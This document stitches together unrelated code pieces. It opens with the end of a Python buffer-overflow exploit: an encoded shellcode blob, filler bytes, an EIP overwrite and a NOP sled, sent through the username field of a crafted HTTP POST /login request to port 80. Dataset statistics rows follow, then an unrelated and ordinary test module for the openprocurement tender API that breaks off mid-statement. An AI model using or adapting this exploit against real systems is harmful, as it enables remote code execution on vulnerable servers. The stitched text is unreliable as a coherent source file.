"\xc0\x78\xc5\x8c\xfd\x9a\xa6\x71\x58\xd1\x4b\x65\xd1\xb8\x03"
"\x4a\xd8\x42\xd4\xc4\x6b\x31\xe6\x4b\xc0\xdd\x4a\x03\xce\x1a"
"\xac\x3e\xb6\xb4\x53\xc1\xc7\x9d\x97\x95\x97\xb5\x3e\x96\x73"
"\x45\xbe\x43\xd3\x15\x10\x3c\x94\xc5\xd0\xec\x7c\x0f\xdf\xd3"
"\x9d\x30\x35\x7c\x37\xcb\xde\x43\x60\xa4\xcf\x2c\x73\x4a\xf1"
"\x17\xfa\xac\x9b\x77\xab\x67\x34\xe1\xf6\xf3\xa5\xee\x2c\x7e"
"\xe5\x65\xc3\x7f\xa8\x8d\xae\x93\x5d\x7e\xe5\xc9\xc8\x81\xd3"
"\x65\x96\x10\xb8\x75\xd1\x08\x17\x22\xb6\xff\x6e\xa6\x2a\x59"
"\xd9\xd4\xb6\x3f\x22\x5c\x6d\xfc\xad\x5d\xe0\xb8\x89\x4d\x3c"
"\x40\x96\x39\x90\x17\x40\x97\x56\xce\x22\x41\x01\xbd\xec\x05"
"\xd4\x8d\x2e\x53\xd9\xdb\xd8\xbb\x68\xb2\x9c\xc4\x45\x52\x29"
"\xbd\xbb\xc2\xd6\x14\x78\xf2\x9c\x34\x29\x9b\x78\xad\x6b\xc6"
"\x7a\x18\xaf\xff\xf8\xa8\x50\x04\xe0\xd9\x55\x40\xa6\x32\x24"
"\xd9\x43\x34\x9b\xda\x41")
filler = "A" * 780
eip = "\x83\x0c\x09\x10"
offset = "C" * 4
nops = "\x90" * 10
# buffer = "D" * (1500 - len(filler) - len(eip) - len(offset))
inputBuffer = filler + eip + offset + nops + shellcode
content = "username=" + inputBuffer + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer +="Host: 0.0.0.0\r\n"
buffer +="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer +="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer +="Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://0.0.0.0/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer+= content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (("0.0.0.0", 80))
s.send(buffer)
s.close()
print"\n Nothing happened here..."
except:
print"Cloud not connect!"
| 52.824324 | 825 | 0.67562 | 551 | 3,909 | 4.787659 | 0.491833 | 0.009098 | 0.036391 | 0.004549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235846 | 0.155027 | 3,909 | 73 | 826 | 53.547945 | 0.562822 | 0.244308 | 0 | 0 | 0 | 0.471698 | 0.662258 | 0.520176 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0.018868 | 0.018868 | null | null | 0.056604 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbeac69390e3b6c4a8ad5aa3171f252f2fb84e18 | 78 | py | Python | communication_modules/websocketClient/__init__.py | maxakuru/SimpleSensor | 655d10ebed5eddb892d036012cb12ccd6b460d2d | [
"Apache-2.0"
] | null | null | null | communication_modules/websocketClient/__init__.py | maxakuru/SimpleSensor | 655d10ebed5eddb892d036012cb12ccd6b460d2d | [
"Apache-2.0"
] | null | null | null | communication_modules/websocketClient/__init__.py | maxakuru/SimpleSensor | 655d10ebed5eddb892d036012cb12ccd6b460d2d | [
"Apache-2.0"
] | null | null | null | from websocketClientModule import WebsocketClientModule as CommunicationMethod | 78 | 78 | 0.935897 | 6 | 78 | 12.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064103 | 78 | 1 | 78 | 78 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e0113e2bd24d4bd31b1158f60c0a0da39a7c3d6c | 53,773 | py | Python | openprocurement/tender/openua/tests/tender_blanks.py | openprocurement/openprocurement.tender.openua | 66b9e15da13a2c367dc15c441a4f02946fc29240 | [
"Apache-2.0"
] | 8 | 2016-01-28T11:37:09.000Z | 2019-03-17T07:18:09.000Z | openprocurement/tender/openua/tests/tender_blanks.py | openprocurement/openprocurement.tender.openua | 66b9e15da13a2c367dc15c441a4f02946fc29240 | [
"Apache-2.0"
] | 70 | 2016-02-11T16:46:22.000Z | 2018-03-19T15:42:16.000Z | openprocurement/tender/openua/tests/tender_blanks.py | openprocurement/openprocurement.tender.openua | 66b9e15da13a2c367dc15c441a4f02946fc29240 | [
"Apache-2.0"
] | 30 | 2016-01-27T10:51:00.000Z | 2019-03-31T15:56:52.000Z | # -*- coding: utf-8 -*-
from datetime import timedelta
from copy import deepcopy
from openprocurement.api.models import get_now
from openprocurement.api.constants import SANDBOX_MODE, CPV_ITEMS_CLASS_FROM
from openprocurement.tender.core.constants import (
NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM
)
from openprocurement.tender.belowthreshold.tests.base import test_organization, test_lots
from openprocurement.tender.openua.models import Tender
# Tender UA Test
def simple_add_tender(self):
u = Tender(self.initial_data)
u.tenderID = "UA-X"
assert u.id is None
assert u.rev is None
u.store(self.db)
assert u.id is not None
assert u.rev is not None
fromdb = self.db.get(u.id)
assert u.tenderID == fromdb['tenderID']
assert u.doc_type == "Tender"
assert u.procurementMethodType == "aboveThresholdUA"
u.delete_instance(self.db)
# TenderUAResourceTest
def empty_listing(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertNotIn('{\n "', response.body)
self.assertNotIn('callback({', response.body)
self.assertEqual(response.json['next_page']['offset'], '')
self.assertNotIn('prev_page', response.json)
response = self.app.get('/tenders?opt_jsonp=callback')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/javascript')
self.assertNotIn('{\n "', response.body)
self.assertIn('callback({', response.body)
response = self.app.get('/tenders?opt_pretty=1')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('{\n "', response.body)
self.assertNotIn('callback({', response.body)
response = self.app.get('/tenders?opt_jsonp=callback&opt_pretty=1')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/javascript')
self.assertIn('{\n "', response.body)
self.assertIn('callback({', response.body)
response = self.app.get('/tenders?offset=2015-01-01T00:00:00+02:00&descending=1&limit=10')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertIn('descending=1', response.json['next_page']['uri'])
self.assertIn('limit=10', response.json['next_page']['uri'])
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertIn('limit=10', response.json['prev_page']['uri'])
response = self.app.get('/tenders?feed=changes')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertEqual(response.json['next_page']['offset'], '')
self.assertNotIn('prev_page', response.json)
response = self.app.get('/tenders?feed=changes&offset=0', status=404)
self.assertEqual(response.status, '404 Not Found')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Offset expired/invalid', u'location': u'params', u'name': u'offset'}
])
response = self.app.get('/tenders?feed=changes&descending=1&limit=10')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertIn('descending=1', response.json['next_page']['uri'])
self.assertIn('limit=10', response.json['next_page']['uri'])
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertIn('limit=10', response.json['prev_page']['uri'])
def create_tender_invalid(self):
request_path = '/tenders'
response = self.app.post(request_path, 'data', status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description':
u"Content-Type header should be one of ['application/json']", u'location': u'header',
u'name': u'Content-Type'}
])
response = self.app.post(
request_path, 'data', content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'No JSON object could be decoded',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, 'data', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'not_data': {}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': []}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'invalid_value'}}, status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Not implemented', u'location': u'data', u'name': u'procurementMethodType'}
])
response = self.app.post_json(request_path, {'data': {
'procurementMethodType': 'aboveThresholdUA',
'invalid_field': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Rogue field', u'location':
u'body', u'name': u'invalid_field'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'value': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [
u'Please use a mapping for this field or Value instance instead of unicode.'], u'location': u'body',
u'name': u'value'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'procurementMethod': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertIn({u'description': [u"Value must be one of ['open', 'selective', 'limited']."], u'location': u'body',
u'name': u'procurementMethod'}, response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'tenderPeriod'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'minimalStep'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'items'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'value'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'items'},
response.json['errors'])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'enquiryPeriod': {'endDate': 'invalid_value'}}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'endDate': [u"Could not parse invalid_value. Should be ISO8601."]}, u'location': u'body',
u'name': u'enquiryPeriod'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'enquiryPeriod': {'endDate': '9999-12-31T23:59:59.999999'}}},
status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'endDate': [u'date value out of range']}, u'location': u'body', u'name': u'enquiryPeriod'}
])
data = self.initial_data['tenderPeriod']
self.initial_data['tenderPeriod'] = {'startDate': '2014-10-31T00:00:00', 'endDate': '2014-10-01T00:00:00'}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['tenderPeriod'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'startDate': [u'period should begin before its end']}, u'location': u'body',
u'name': u'tenderPeriod'}
])
self.initial_data['tenderPeriod']['startDate'] = (get_now() - timedelta(minutes=30)).isoformat()
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
del self.initial_data['tenderPeriod']['startDate']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'tenderPeriod.startDate should be in greater than current date'], u'location': u'body',
u'name': u'tenderPeriod'}
])
now = get_now()
self.initial_data['awardPeriod'] = {'startDate': now.isoformat(), 'endDate': now.isoformat()}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
del self.initial_data['awardPeriod']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'period should begin after tenderPeriod'], u'location': u'body', u'name': u'awardPeriod'}
])
self.initial_data['auctionPeriod'] = {'startDate': (now + timedelta(days=16)).isoformat(),
'endDate': (now + timedelta(days=16)).isoformat()}
self.initial_data['awardPeriod'] = {'startDate': (now + timedelta(days=15)).isoformat(),
'endDate': (now + timedelta(days=15)).isoformat()}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
del self.initial_data['auctionPeriod']
del self.initial_data['awardPeriod']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'period should begin after auctionPeriod'], u'location': u'body', u'name': u'awardPeriod'}
])
data = self.initial_data['minimalStep']
self.initial_data['minimalStep'] = {'amount': '1000.0'}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['minimalStep'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'value should be less than value of tender'], u'location': u'body', u'name': u'minimalStep'}
])
data = self.initial_data['minimalStep']
self.initial_data['minimalStep'] = {'amount': '100.0', 'valueAddedTaxIncluded': False}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['minimalStep'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'valueAddedTaxIncluded should be identical to valueAddedTaxIncluded of value of tender'],
u'location': u'body', u'name': u'minimalStep'}
])
data = self.initial_data['minimalStep']
self.initial_data['minimalStep'] = {'amount': '100.0', 'currency': "USD"}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['minimalStep'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'currency should be identical to currency of value of tender'], u'location': u'body',
u'name': u'minimalStep'}
])
data = self.initial_data["items"][0].pop("additionalClassifications")
if get_now() > CPV_ITEMS_CLASS_FROM:
cpv_code = self.initial_data["items"][0]['classification']['id']
self.initial_data["items"][0]['classification']['id'] = '99999999-9'
status = 422 if get_now() < NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM else 201
response = self.app.post_json(request_path, {'data': self.initial_data}, status=status)
self.initial_data["items"][0]["additionalClassifications"] = data
if get_now() > CPV_ITEMS_CLASS_FROM:
self.initial_data["items"][0]['classification']['id'] = cpv_code
if status == 201:
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
else:
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [u'This field is required.']}], u'location': u'body',
u'name': u'items'}
])
data = self.initial_data["items"][0]["additionalClassifications"][0]["scheme"]
self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = 'Не ДКПП'
if get_now() > CPV_ITEMS_CLASS_FROM:
cpv_code = self.initial_data["items"][0]['classification']['id']
self.initial_data["items"][0]['classification']['id'] = '99999999-9'
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = data
if get_now() > CPV_ITEMS_CLASS_FROM:
self.initial_data["items"][0]['classification']['id'] = cpv_code
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
if get_now() > CPV_ITEMS_CLASS_FROM:
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [
u"One of additional classifications should be one of [ДК003, ДК015, ДК018, specialNorms]."]}],
u'location': u'body', u'name': u'items'}
])
else:
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [
u"One of additional classifications should be one of [ДКПП, NONE, ДК003, ДК015, ДК018]."]}],
u'location': u'body', u'name': u'items'}
])
data = test_organization["contactPoint"]["telephone"]
del test_organization["contactPoint"]["telephone"]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
test_organization["contactPoint"]["telephone"] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'contactPoint': {u'email': [u'telephone or email should be present']}}, u'location': u'body',
u'name': u'procuringEntity'}
])
data = self.initial_data["items"][0].copy()
classification = data['classification'].copy()
classification["id"] = u'19212310-1'
data['classification'] = classification
self.initial_data["items"] = [self.initial_data["items"][0], data]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"] = self.initial_data["items"][:1]
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'CPV group of items be identical'], u'location': u'body', u'name': u'items'}
])
data = deepcopy(self.initial_data)
del data["items"][0]['deliveryDate']['endDate']
response = self.app.post_json(request_path, {'data': data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'deliveryDate': {u'endDate': [u'This field is required.']}}], u'location': u'body',
u'name': u'items'}
])
def create_tender_generated(self):
data = self.initial_data.copy()
# del data['awardPeriod']
data.update({'id': 'hash', 'doc_id': 'hash2', 'tenderID': 'hash3'})
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
if 'procurementMethodDetails' in tender:
tender.pop('procurementMethodDetails')
self.assertEqual(set(tender), set([
u'procurementMethodType', u'id', u'dateModified', u'tenderID',
u'status', u'enquiryPeriod', u'tenderPeriod', u'complaintPeriod',
u'minimalStep', u'items', u'value', u'procuringEntity',
u'next_check', u'procurementMethod', u'awardCriteria',
u'submissionMethod', u'auctionPeriod', u'title', u'owner', u'date',
]))
self.assertNotEqual(data['id'], tender['id'])
self.assertNotEqual(data['doc_id'], tender['id'])
self.assertNotEqual(data['tenderID'], tender['tenderID'])
def tender_fields(self):
response = self.app.post_json('/tenders', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_set = set(tender)
if 'procurementMethodDetails' in tender_set:
tender_set.remove('procurementMethodDetails')
self.assertEqual(tender_set - set(self.initial_data), set([
u'id', u'dateModified', u'enquiryPeriod', u'auctionPeriod',
u'complaintPeriod', u'tenderID', u'status', u'procurementMethod',
u'awardCriteria', u'submissionMethod', u'next_check', u'owner', u'date',
]))
self.assertIn(tender['id'], response.headers['Location'])
def patch_draft_invalid_json(self):
data = self.initial_data.copy()
data.update({'status': 'draft'})
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
owner_token = response.json['access']['token']
self.assertEqual(tender['status'], 'draft')
response = self.app.patch('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
"{}d", content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{
"location": "body",
"name": "data",
"description": "Extra data: line 1 column 3 - line 1 column 4 (char 2 - 3)"
}
])
def patch_tender(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
first_date = tender['date']
self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
dateModified = tender.pop('dateModified')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'status': 'cancelled'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['date'], first_date)
self.assertNotEqual(response.json['data']['status'], 'cancelled')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'status': 'cancelled'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotEqual(response.json['data']['status'], 'cancelled')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'procuringEntity': {'kind': 'defense'}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotEqual(response.json['data']['procuringEntity']['kind'], 'defense')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'tenderPeriod': {'startDate': tender['enquiryPeriod']['endDate']}}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{
"location": "body",
"name": "tenderPeriod",
"description": [
"tenderPeriod should be greater than 15 days"
]
}
])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'procurementMethodRationale': 'Open'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('invalidationDate', response.json['data']['enquiryPeriod'])
new_tender = response.json['data']
new_enquiryPeriod = new_tender.pop('enquiryPeriod')
new_dateModified = new_tender.pop('dateModified')
tender.pop('enquiryPeriod')
tender['procurementMethodRationale'] = 'Open'
self.assertEqual(tender, new_tender)
self.assertNotEqual(dateModified, new_dateModified)
revisions = self.db.get(tender['id']).get('revisions')
self.assertTrue(any(
[i for i in revisions[-1][u'changes'] if i['op'] == u'remove' and i['path'] == u'/procurementMethodRationale']))
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'dateModified': new_dateModified}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
new_tender2 = response.json['data']
new_enquiryPeriod2 = new_tender2.pop('enquiryPeriod')
new_dateModified2 = new_tender2.pop('dateModified')
self.assertEqual(new_tender, new_tender2)
self.assertNotEqual(new_enquiryPeriod, new_enquiryPeriod2)
self.assertNotEqual(new_dateModified, new_dateModified2)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [self.initial_data['items'][0]]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [{}, self.initial_data['items'][0]]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
item0 = response.json['data']['items'][0]
item1 = response.json['data']['items'][1]
self.assertNotEqual(item0.pop('id'), item1.pop('id'))
self.assertEqual(item0, item1)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [{}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(len(response.json['data']['items']), 1)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"classification": {
"scheme": "ДК021",
"id": "44620000-2",
"description": "Cartons 2"
}}]}}, status=200)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"classification": {
"scheme": "ДК021",
"id": "55523100-3",
"description": "Послуги з харчування у школах"
}}]}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't change classification")
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"additionalClassifications": [
tender['items'][0]["additionalClassifications"][0] for i in range(3)
]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {
'data': {'items': [{"additionalClassifications": tender['items'][0]["additionalClassifications"]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'enquiryPeriod': {'endDate': new_dateModified2}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't change enquiryPeriod")
self.set_status('complete')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'status': 'active.auction'}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update tender in current (complete) status")
def patch_tender_period(self):
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
dateModified = tender.pop('dateModified')
self.tender_id = tender['id']
self.go_to_enquiryPeriod_end()
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data': {"description": "new description"}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "tenderPeriod should be extended by 7 days")
tenderPeriod_endDate = get_now() + timedelta(days=7, seconds=10)
enquiryPeriod_endDate = tenderPeriod_endDate - (timedelta(minutes=10) if SANDBOX_MODE else timedelta(days=10))
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data':
{
"description": "new description",
"tenderPeriod": {
"endDate": tenderPeriod_endDate.isoformat()
}
}
})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['tenderPeriod']['endDate'], tenderPeriod_endDate.isoformat())
self.assertEqual(response.json['data']['enquiryPeriod']['endDate'], enquiryPeriod_endDate.isoformat())
# TenderUAProcessTest
def invalid_bid_tender_features(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
data = deepcopy(self.initial_data)
data['features'] = [
{
"code": "OCDS-123454-POSTPONEMENT",
"featureOf": "tenderer",
"title": u"Відстрочка платежу",
"description": u"Термін відстрочки платежу",
"enum": [
{
"value": 0.05,
"title": u"До 90 днів"
},
{
"value": 0.1,
"title": u"Більше 90 днів"
}
]
}
]
response = self.app.post_json('/tenders',
{"data": data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'parameters': [{"code": "OCDS-123454-POSTPONEMENT", "value": 0.1}],
'tenderers': [test_organization], "value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
